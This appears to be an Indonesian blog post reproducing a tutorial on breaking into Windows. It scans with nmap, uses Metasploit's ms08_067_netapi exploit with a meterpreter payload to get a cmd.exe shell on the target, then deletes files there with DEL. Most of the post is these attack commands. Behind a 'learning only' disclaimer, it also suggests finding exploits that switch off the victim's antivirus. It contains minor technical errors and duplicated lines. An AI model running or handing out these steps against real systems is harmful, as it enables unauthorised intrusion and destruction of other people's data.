[Hacking] Hajar Windows lewat port 135
Assalamu’alaikum,
Tulisan
ini dibuat berdasarkan catatan asli mas Andi Susilo di Facebook nya serta telah mendapat Izin darinya untuk menulis ulang
kembali. Dan sekarang catatan tersebut tidak ditemukan lagi, tidak diketahui
apa sebabnya. Sebelumnya, saya ingin menyampaikan, tidak ada yang dikurangi
bahkan diubah kecuali susunan paragraf dan tatanan bahasa dari salinan asli.
Semua itu dilakukan untuk kemudahan dalam memahami oleh para pembaca dan tidak
menghilangkan cita rasa tulisan aslinya. Dan semua yang ada dalam tulisan ini
hanya untuk belajar semata, saya sebagai pemilik blog, tidak bertanggung
jawab dengan apa yang terjadi sesudah itu. Selamat menikmati.
Peralatan
yg mesti dipersiapkan adalah 2 buah komputer dengan sistem operasi Distro
Linux Backtrack atau Ubuntudan Windows lalu
sambungkan dengan kabel LAN, karena ini bukan belajar jahat maka kita mesti
modal sendiri, jangan komputer orang lain yang di hajar, kemudian install nmap danmetasploit di
komputer ber OS Linux
Berikut
langkah-langkahnya :
Pertama
Jika kita menggunakan Backtrack Linux, langsung saja ketik di terminalnya
Jika kita menggunakan Backtrack Linux, langsung saja ketik di terminalnya
sudo
apt-get install metaspoit
tapi
jika kita pakai Ubuntu Linux, terpaksa kita harus add
sourcelist nya backtrack di sources list nya ubuntu.
Ini caranya. Jika sudah di install, sekarang coba jalankan
metasploitnya. Ada 3 jenis tipe metasploit, aktifkan terminal/console lalu
ketik
$msfconsole (ini
buat menjalankan metasploit yang berbasis console),
$msfgui (ini
buat menjalankan metasploit berbasis applikasi desktop),
$msfweb (ini
buat menjalankan metasploit yg berbasis web), jadi ketika anda membuka browser,
lalu di addressbarnya ketikan 127.0.0.1:5555
Silahkan
pilih yang nyaman bagi anda, kalau saya pilih console/terminal.
Kedua
Berikut langkah menggunakan terminal, aktifkan terminal anda, ketikkan
Berikut langkah menggunakan terminal, aktifkan terminal anda, ketikkan
$nmap
ip-target ,
Seperti
gambar berikut :
Lihat,
port 135 nya terbuka, berarti ada harapan lanjut ke langkah selanjutnya.
Kemudian
aktifkan metasploitnya, dengan cara ketik diterminal
$msfconsole
berikut
screenshoot nya :
Ketiga
Mulailah kita, melihat jenis exploit yg ada di metasploit dengan cara ketik
Mulailah kita, melihat jenis exploit yg ada di metasploit dengan cara ketik
show
exploits
tapi
jika anda sudah tidak sabar karena melihat port 135terbuka,
langsung hajar, dengan mengetikkan
use
windows/smb/ms08_067_netapi
Enter
show
payload
Enter
ini
buat melihat payload yang ada di metasploit, pilih
salah satu
set
payload windows/meterpreter/bind_tcp
Enter
set
lhost 192.168.1.1
Enter,
langkah diatas adalah memasukkan alamat ip komputer kita
set
rhost 192.168.1.2
Enter,
selanjutnya langkah diatas adalah memasukkan ip komputer target
exploit
Enter,
selanjutnya jika muncul tulisan seperti ini
Exploit
completed, but no session was created
Berarti
antivirus target keren alias bagus, cari lagi exploit yang bisa menon aktifkan
anti virus. Tapi kalo yg muncul
meterpreter
brati
anda telah sukses, lanjut ke exploit dengan mengetikkan
execute
-f cmd.exe -c -i
Enter,
jadinya
seperti ini gambarnya:
Keempat
Lihat baris yg paling bawah, anda sudah masuk ke system32nya windows. Sekarang saatnya menghajar windows. Gampang kok. Gunakan saja perintah
Lihat baris yg paling bawah, anda sudah masuk ke system32nya windows. Sekarang saatnya menghajar windows. Gampang kok. Gunakan saja perintah
DIR
untuk
melihat file-file dan folder serta perintah
DEL
untuk
menghapus file/folder
coba
aja ketikkan DIR, maka akan keluar nama file dan foldernya, seperti
gambar ini:
Tinggal
ketik DEL diiringi dengan namafile, jika anda ingin
menghapusnya. Windowsnya selesai. Sekarang silahkan di patch system anda
(pengguna Windows), karena ubuntu imut, lucu danmanis bisa
menghajar dari belakang.
Penggunaan module
exploit dengan menggunakan metasploitbanyak sekali,
silahkan lihat disini untuk babat server
windows juga ada kok. Silahkan dipelajari bagi yang gemar dengan jaringan.
Wassalam
